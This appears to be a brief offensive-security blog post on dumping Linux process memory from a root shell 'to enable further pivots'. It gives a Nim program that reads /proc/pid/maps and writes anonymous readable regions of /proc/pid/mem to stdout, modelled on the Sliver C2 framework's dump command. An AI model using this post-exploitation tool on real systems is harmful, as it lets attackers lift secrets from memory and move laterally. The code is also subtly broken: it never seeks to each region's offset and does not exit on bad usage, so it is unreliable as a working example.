You want to inspect process memory to enable further pivots within an environment.
You have root access to a Linux host, and no Linux Security Modules block access to /proc.
A statically linked binary is especially convenient here - as is learning from how others have solve the problem (e.g. from Sliver's Dump Process Memory command).
This nim code reads metadata from /proc/pid/maps, and dumps to stdout offsets of /proc/pid/mem that are: readable, non executable, and non-file-backed. My experience mirrored the Sliver developer's in that [vvar]
and [vdso]
errored out when attempting to read them:
import std/os
import std/strutils
import std/strformat
if paramCount() != 1:
echo &"Usage: {paramStr(0)} <pid>"
let f = open(&"/proc/{paramStr(1)}/mem")
for line in lines(&"/proc/{paramStr(1)}/maps"):
let parts = line.split(" ")
# readable memory but not executable code
if parts[1][0] == 'r' and not parts[1].contains('x'):
# skip files mapped into memory
if parts[3] == "00:00":
# skip memory we will error out accessing
if not(line.endsWith("[vvar]") or line.endsWith("[vdso]")):
let addresses = parts[0].split("-")
let offset_start = addresses[0].parseHexInt()
let offset_end = addresses[1].parseHexInt()
var buffer: array[1024, int8]
var remaining = offset_end-offset_start
while remaining > 0:
let n = f.readBytes(buffer, 0, min(remaining, 1024))
remaining -= n
discard stdout.writeBytes(buffer, 0, n)
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